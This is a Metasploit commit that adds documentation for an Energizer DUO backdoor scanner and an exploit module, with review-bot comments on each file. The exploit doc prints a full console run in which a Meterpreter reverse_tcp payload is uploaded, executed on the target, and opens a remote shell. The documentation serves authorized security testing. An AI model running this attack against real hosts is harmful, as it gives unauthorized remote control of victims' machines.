Land #8297, add docs for energizer duo scanner and exploit

bug/bundler_fix
Brent Cook 2017-05-08 17:14:36 -05:00
commit 96e3d61883
No known key found for this signature in database
GPG Key ID: 1FFAA0B24B708F96
2 changed files with 63 additions and 0 deletions

@ -0,0 +1,27 @@
## Vulnerable Application
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect`
4. Do: `set rhosts`
5. Do: `run`
## Scenarios
A run against the backdoor
```
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]...
```
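Review bot: Verification step 4 (`set rhosts`) has no value or placeholder, while the scenario uses `set RHOSTS 192.168.0.0/24`; write it as `set rhosts [ip or range]` so the step can be followed as written. The steps also stop at `run` without saying what a positive result looks like; add a final step noting that a host with the backdoor is reported with a `FOUND:` line, as in the scenario. The scenario sets `THREADS 256` without comment and does not state which OS or software version was tested; one line on each would make the run reproducible. A blank line after each `##` heading would also keep the markdown rendering consistently.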

@ -0,0 +1,36 @@
## Vulnerable Application
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan).
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777.
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx).
## Verification Steps
1. Install the vulnerable software
2. Start msfconsole
3. Do: `use exploit/windows/backdoor/energizer_duo_payload`
4. Do: `set rhost`
5. Do: `set payload`
6. Do: `exploit`
## Scenarios
A run against the backdoor
```
msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228
msf exploit(energizer_duo_payload) > exploit
[*] Started reverse handler on 192.168.0.228:4444
[*] Trying to upload C:\NTL0ZTL4DhVL.exe...
[*] Trying to execute C:\NTL0ZTL4DhVL.exe...
[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200)
meterpreter > getuid
Server username: XPDEV\Developer
```
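Review bot: Verification steps 4 and 5 (`set rhost`, `set payload`) carry no values or placeholders, and the scenario also sets `LHOST`, which the steps never mention; list all three with placeholders so the steps match the scenario. Add a closing step that states the expected result (a session opens). The scenario output shows an executable being written to `C:\` on the target, so the doc should say that the module leaves a file on disk and whether it is cleaned up, since anyone running this in a lab will need to know what to remove afterwards. The target OS is only implied by the `XPDEV` hostname; state it in the scenario heading. The Vulnerable Application section is a verbatim copy of the scanner doc's, which is fine, but a sentence on what this module does differently from the scanner would help readers landing here first.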